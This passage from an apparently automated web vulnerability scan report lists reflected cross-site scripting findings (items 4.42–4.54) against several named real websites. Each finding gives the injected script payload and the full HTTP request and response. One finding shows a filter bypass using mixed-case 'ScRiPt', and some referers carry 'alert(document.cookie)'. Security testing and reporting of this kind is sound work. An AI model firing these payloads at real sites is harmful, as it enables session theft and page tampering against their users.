Set-Cookie: myAlltopSession=065jkhrbmh85idvk74bpr630u0; path=/; domain=.alltop.com
Expires: Sat, 16 Apr 2011 14:51:50 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Mon, 15 Nov 2010 16:29:58 GMT
Set-Cookie: alltop_r=2; expires=Fri, 15-Jul-2011 13:51:50 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 930373

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/css/din-bold.swf91506"><script>alert(1)</script>bc3da8f28a0" method="post" accept-charset="utf-8">
...[SNIP]...

4.42. http://law.alltop.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://law.alltop.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32383"><script>alert(1)</script>e537a41bbed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico32383"><script>alert(1)</script>e537a41bbed HTTP/1.1
Host: law.alltop.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: myAlltopSession=065jkhrbmh85idvk74bpr630u0; alltop_v=eb8e1238e83a994c827243f20aced46d; alltop_r=2; sifrFetch=true; __qca=P0-1457044879-1302961854448; __utmz=160012002.1302961854.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; __utma=160012002.1443153480.1302961854.1302961854.1302961854.1; __utmc=160012002; __utmb=160012002.2.9.1302961854546; __qseg=Q_D|Q_T|Q_2891|Q_2360|Q_2349|Q_2346|Q_2340|Q_1659|Q_1286|Q_1155|Q_1154|Q_1153|Q_1151|Q_1150|Q_1149|Q_1148|Q_1147|Q_1145|Q_983|Q_982

Response

HTTP/1.1 404 Not Found
Date: Sat, 16 Apr 2011 13:51:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Fri, 16-Apr-2010 13:51:32 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=065jkhrbmh85idvk74bpr630u0; path=/; domain=.alltop.com
Expires: Sat, 16 Apr 2011 14:51:32 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Mon, 15 Nov 2010 16:29:58 GMT
Set-Cookie: alltop_r=2; expires=Fri, 15-Jul-2011 13:51:32 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 930353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/favicon.ico32383"><script>alert(1)</script>e537a41bbed" method="post" accept-charset="utf-8">
...[SNIP]...

4.43. http://law.alltop.com/widget/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://law.alltop.com
Path:   /widget/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fa3b"><script>alert(1)</script>3c139cf78b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /widget2fa3b"><script>alert(1)</script>3c139cf78b0/?type=js HTTP/1.1
Host: law.alltop.com
Proxy-Connection: keep-alive
Referer: http://www.jamesprobinsonlaw.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 16 Apr 2011 13:49:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Fri, 16-Apr-2010 13:49:07 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=vpc5m17i3plcmgqib9tk2rbp06; path=/; domain=.alltop.com
Expires: Sat, 16 Apr 2011 14:49:07 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Mon, 15 Nov 2010 16:29:58 GMT
Set-Cookie: alltop_v=4ca316e9121138d4d76ae9359c78da59; expires=Tue, 13-Apr-2021 13:49:07 GMT; path=/; domain=law.alltop.com
Set-Cookie: alltop_r=2; expires=Fri, 15-Jul-2011 13:49:07 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 930369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/widget2fa3b"><script>alert(1)</script>3c139cf78b0/?type=js" method="post" accept-charset="utf-8">
...[SNIP]...

4.44. http://mbox9e.offermatica.com/m2/eset/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mbox9e.offermatica.com
Path:   /m2/eset/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 6210f<script>alert(1)</script>d253288866b was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/eset/mbox/standard?mboxHost=www.eset.com&mboxSession=1303045152447-372951&mboxPage=1303045152447-372951&mboxCount=1&mbox=mbx_company_landing6210f<script>alert(1)</script>d253288866b&mboxId=0&mboxTime=1303027152504&mboxURL=http%3A%2F%2Fwww.eset.com%2Fus%2Fcompany&mboxReferrer=&mboxVersion=37 HTTP/1.1
Host: mbox9e.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/company
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 215
Date: Sun, 17 Apr 2011 12:59:57 GMT
Server: Test & Target

mboxFactories.get('default').get('mbx_company_landing6210f<script>alert(1)</script>d253288866b',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1303045152447-372951.17");

4.45. http://s25.sitemeter.com/js/counter.asp [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s25.sitemeter.com
Path:   /js/counter.asp

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18a21'%3balert(1)//a3344cc69fd was submitted in the site parameter. This input was echoed as 18a21';alert(1)//a3344cc69fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/counter.asp?site=s25hadashot18a21'%3balert(1)//a3344cc69fd HTTP/1.1
Host: s25.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.hadash-hot.co.il/login.php?return=/submit.php?69123%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Efab6770260=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:35:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7320
Content-Type: application/x-javascript
Expires: Sun, 17 Apr 2011 14:45:04 GMT
Set-Cookie: IP=173%2E193%2E214%2E243; path=/js
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
.addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s25hadashot18a21';alert(1)//a3344cc69fd', 's25.sitemeter.com', '');

var g_sLastCodeName = 's25hadashot18a21';alert(1)//a3344cc69fd';
// ]]>
...[SNIP]...

4.46. http://s25.sitemeter.com/js/counter.js [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s25.sitemeter.com
Path:   /js/counter.js

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39f79'%3balert(1)//80af3977918 was submitted in the site parameter. This input was echoed as 39f79';alert(1)//80af3977918 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/counter.js?site=s25hadashot39f79'%3balert(1)//80af3977918 HTTP/1.1
Host: s25.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.hadash-hot.co.il/login.php?return=/submit.php?69123%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Efab6770260=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:35:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7320
Content-Type: application/x-javascript
Expires: Sun, 17 Apr 2011 14:45:05 GMT
Set-Cookie: IP=173%2E193%2E214%2E243; path=/js
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
.addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s25hadashot39f79';alert(1)//80af3977918', 's25.sitemeter.com', '');

var g_sLastCodeName = 's25hadashot39f79';alert(1)//80af3977918';
// ]]>
...[SNIP]...

4.47. http://theautomaster.com/smartbrowse/ajax/new.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://theautomaster.com
Path:   /smartbrowse/ajax/new.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab6c3"><script>alert(1)</script>d3cbc0a7a50 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartbrowseab6c3"><script>alert(1)</script>d3cbc0a7a50/ajax/new.htm?detect=false&reset=InventoryListing&showYear=true&showMake=true&showModel=true&showAllModels=true&showTrim=&showBodyStyle=true&showMileage=true&showPrice=true&showLocation=false&showHighywayMpgs=false HTTP/1.1
Host: theautomaster.com
Proxy-Connection: keep-alive
Referer: http://theautomaster.com/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=5f434b3b0a0a002d004d9ebf7ccb20d0; JSESSIONID=10ue49uec8ctq; lbpoolmember=1711345162.40475.0000; ddcpoolid=CmsPoolE

Response

HTTP/1.1 404 Not Found
Date: Sat, 16 Apr 2011 17:04:30 GMT
Server: Jetty/5.1.1 (Linux/2.6.18-128.7.1.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14533

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms25.dealer.ddc p7070 -->

   <title>The Automaster of Shelburne, VT</title>
   <meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=&amp;20=theautomaster.com&amp;21=/smartbrowseab6c3"><script>alert(1)</script>d3cbc0a7a50/ajax/new.htm&amp;50=5f434b3b0a0a002d004d9ebf7ccb20d0&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-
...[SNIP]...

4.48. http://theautomaster.com/smartbrowse/ajax/new.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://theautomaster.com
Path:   /smartbrowse/ajax/new.htm

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e37f"><script>alert(1)</script>2357d3fddc1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartbrowse/ajax1e37f"><script>alert(1)</script>2357d3fddc1/new.htm?detect=false&reset=InventoryListing&showYear=true&showMake=true&showModel=true&showAllModels=true&showTrim=&showBodyStyle=true&showMileage=true&showPrice=true&showLocation=false&showHighywayMpgs=false HTTP/1.1
Host: theautomaster.com
Proxy-Connection: keep-alive
Referer: http://theautomaster.com/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=5f434b3b0a0a002d004d9ebf7ccb20d0; JSESSIONID=10ue49uec8ctq; lbpoolmember=1711345162.40475.0000; ddcpoolid=CmsPoolE

Response

HTTP/1.1 404 Not Found
Date: Sat, 16 Apr 2011 17:04:42 GMT
Server: Jetty/5.1.1 (Linux/2.6.18-128.7.1.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14533

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms25.dealer.ddc p7070 -->

   <title>The Automaster of Shelburne, VT</title>
   <meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=&amp;20=theautomaster.com&amp;21=/smartbrowse/ajax1e37f"><script>alert(1)</script>2357d3fddc1/new.htm&amp;50=5f434b3b0a0a002d004d9ebf7ccb20d0&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=10&
...[SNIP]...

4.49. http://theautomaster.com/used-inventory/index.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://theautomaster.com
Path:   /used-inventory/index.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4380"><script>alert(1)</script>7f92519afdd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /used-inventoryf4380"><script>alert(1)</script>7f92519afdd/index.htm?reset=InventoryListing HTTP/1.1
Host: theautomaster.com
Proxy-Connection: keep-alive
Referer: http://theautomaster.com/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=111725121.1303003248.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; ssoid=610cf6690a0a002d004d9ebff580a7e7; JSESSIONID=1sdotl64whyrk; lbpoolmember=1711345162.40475.0000; ddcpoolid=CmsPoolE; __utma=111725121.1506997093.1302973362.1302973362.1303003248.2; __utmc=111725121; __utmb=111725121.14.5.1303003427103

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 01:41:05 GMT
Server: Jetty/5.1.1 (Linux/2.6.18-128.7.1.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14691

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms25.dealer.ddc p7070 -->

   <title>The Automaster of Shelburne, VT</title>
   <meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=7ddc8'-alert(document.cookie)-'4ac342c68e7&amp;20=theautomaster.com&amp;21=/used-inventoryf4380"><script>alert(1)</script>7f92519afdd/index.htm&amp;50=610cf6690a0a002d004d9ebff580a7e7&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=1
...[SNIP]...

4.50. http://ts.istrack.com/trackingAPI.js [vti parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ts.istrack.com
Path:   /trackingAPI.js

Issue detail

The value of the vti request parameter is copied into the HTML document as plain text between tags. The payload 84994<script>alert(1)</script>651019c713b was submitted in the vti parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trackingAPI.js?ai=1/b7YsF5/LZw+m6HdoJfHSWrtAPLOT1z&evt=20&ri=54028&ii=40200&vti=1c4WFQoBC2cAABF-Y28AAAAAACGeq@x@J8zrRG84994<script>alert(1)</script>651019c713b HTTP/1.1
Host: ts.istrack.com
Proxy-Connection: keep-alive
Referer: http://www.bitdefender.com/solutions/antivirus.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 12:59:29 GMT
Server: Apache
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Length: 114
Connection: close
Content-Type: text/javascript; charset=utf-8

ISVT_setCookie('isvt_visitor', '1c4WFQoBC2cAABF-Y28AAAAAACGeq@x@J8zrRG84994<script>alert(1)</script>651019c713b');

4.51. http://usa.kaspersky.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 420aa"><script>alert(1)</script>7e822a04924 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?420aa"><script>alert(1)</script>7e822a04924=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; s_nr=1303045178067-New; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; evar7=kav_rescue_10.iso; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:04:59 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045499"
Content-Type: text/html; charset=utf-8
Content-Length: 41098
Date: Sun, 17 Apr 2011 13:05:02 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/?420aa"><script>alert(1)</script>7e822a04924=1" />
...[SNIP]...

4.52. http://usa.kaspersky.com/downloads [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 111b7"-alert(1)-"57da2f5aecf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads111b7"-alert(1)-"57da2f5aecf HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://www.kaspersky.com/virusscanner
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.1.10.1303044891; evar7=kav_rescue_10.iso; s_nr=1303045169558-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:00:01 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045201"
Content-Type: text/html; charset=utf-8
Content-Length: 30202
Date: Sun, 17 Apr 2011 13:00:04 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloads111b7"-alert(1)-"57da2f5aecf";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

4.53. http://usa.kaspersky.com/downloads [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85cf9"><ScRiPt>alert(1)</ScRiPt>2d924d33a07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks, but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request

GET /downloads85cf9"><ScRiPt>alert(1)</ScRiPt>2d924d33a07 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://www.kaspersky.com/virusscanner
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.1.10.1303044891; evar7=kav_rescue_10.iso; s_nr=1303045169558-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 12:59:56 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045196"
Content-Type: text/html; charset=utf-8
Content-Length: 30299
Date: Sun, 17 Apr 2011 12:59:58 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads85cf9"><ScRiPt>alert(1)</ScRiPt>2d924d33a07" />
...[SNIP]...

4.54. http://usa.kaspersky.com/downloads [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 213ed"><script>alert(1)</script>2b51f9931de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads?213ed"><script>alert(1)</script>2b51f9931de=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://www.kaspersky.com/virusscanner
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
